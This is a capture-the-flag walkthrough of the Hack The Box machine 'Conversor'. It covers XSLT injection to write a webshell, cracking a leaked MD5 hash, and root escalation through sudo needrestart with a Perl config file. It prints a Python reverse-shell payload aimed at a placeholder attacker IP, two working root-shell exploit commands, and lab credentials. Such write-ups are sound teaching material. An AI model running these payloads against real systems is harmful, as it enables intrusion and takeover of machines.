hackthebox Easy

Conversor

xslt-injection file-write credentials needrestart sudo linux

Overview

Conversor is a Linux box on Hack The Box at 10.10.11.92. The web application processes user-supplied XSLT files, enabling an attacker to write arbitrary files to the webroot. This leads to credential discovery via a SQLite database and SSH access. Privilege escalation abuses needrestart running as root via sudo with a crafted config file.

TL;DR

  • Foothold: XSLT injection to write a Python script under the webroot, exposing users.db with credentials fismathack:Keepmesafeandwarm
  • Privesc: sudo /usr/sbin/needrestart -c <crafted_config> spawns a root shell

Recon

Nmap Scan

1

nmap -p- -T4 10.10.11.92
Port Service Version
22 SSH OpenSSH 8.9p1
80 HTTP Apache/2.4.52

Add the virtual host:

1

echo "10.10.11.92 conversor.htb" | sudo tee -a /etc/hosts

Web App & XSLT Discovery

The web application processes user-supplied XSLT files. Using payloads from PayloadsAllTheThings XSLT Injection, we can read and write server files.

The XSLT payload uses extension elements (ptswarm:document or similar) to write Python files into /var/www/conversor.htb/scripts/.

Foothold

Writing a Webshell via XSLT

  1. Craft an XSLT payload that writes /var/www/conversor.htb/scripts/shell.py containing a reverse shell or command execution stub
  2. Upload the XSLT file through the vulnerable endpoint
  3. Confirm the file is accessible: http://conversor.htb/scripts/shell.py

Example reverse shell payload (replace placeholders):

1
2
3
4
5
6
7

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("[ATTACKER_IP]",[ATTACKER_PORT]))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])

Credentials Discovery

The webroot contained a users.db SQLite database with an INSERT statement:

1

INSERT INTO users VALUES(1,'fismathack','5b5c3ac3a1c897c94caad48e6c71fdec');

Cracking the MD5 hash yields: fismathack:Keepmesafeandwarm

SSH Access

1
2

ssh fismathack@10.10.11.92
# password: Keepmesafeandwarm

User flag obtained from user.txt.

Privilege Escalation — needrestart

Checking sudo permissions:

1
2

sudo -l
# (root) NOPASSWD: /usr/sbin/needrestart

needrestart accepts a -c flag to specify a config file. The config file is parsed as Perl, allowing arbitrary code execution.

Variant A — system() directive

1
2
3
4
5
6

cat > /tmp/exploit.conf << 'EOF'
BEGIN { system("/bin/sh") }
[needrestart]
EOF

sudo /usr/sbin/needrestart -c /tmp/exploit.conf

Variant B — exec with preserved privileges

1
2

echo 'exec "/bin/sh","-p";' > /tmp/con.conf
sudo /usr/sbin/needrestart -c /tmp/con.conf

Both variants spawn a root shell. Read the flag:

1

cat /root/root.txt

Lessons Learned

  • XSLT processors should never allow extension elements that write to the filesystem
  • SQLite databases in the webroot are a common source of credential leaks
  • needrestart with sudo and arbitrary config file access is a known privesc vector — the config is parsed as Perl code